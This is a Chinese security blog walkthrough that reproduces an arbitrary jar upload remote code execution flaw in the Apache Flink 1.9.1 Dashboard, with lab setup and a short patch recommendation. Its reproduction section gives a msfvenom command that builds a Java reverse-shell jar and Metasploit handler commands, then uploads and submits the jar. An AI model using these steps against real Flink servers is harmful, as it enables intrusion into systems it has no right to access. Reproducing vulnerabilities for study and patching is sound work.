Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院

0x00简介

Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01漏洞概述

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

0x02影响范围

到目前Apache Flink 1.9.1版本

0x03环境搭建

攻击机:kali

受害机:ubuntu16

1. 安装java8环境,自行百度教程

图片[1]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

2. 下载Flink1.9.1版本,然后解压安装包

Flink下载地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解压 tar -zxvf

图片[2]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

3. 进入bin目录运行./start-cluster.sh启动环境

图片[3]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

4.在浏览器打开,出现以下界面表示安装成功

图片[4]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

0x04漏洞复现

1. 首先使用kali生成jar的后门包

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar

图片[5]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

2.使用msfconsole监听shell设置的端口

use exploit/multi/handler

set payload java/shell/reverse_tcp

图片[6]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科
图片[7]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

3.run开启监听

图片[8]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

4.把制作好的shell.jar包访问目标站点并上传shell.jar

图片[9]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

5.点击Submit触发漏洞,反弹回了shell

图片[10]-Apache Flink 任意 Jar 包上传致 RCE 漏洞 – 作者:东塔安全学院-安全小百科

0x05修复建议

更新官方补丁或更新最新版本

来源:freebuf.com 2020-12-03 15:46:46 by: 东塔安全学院

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论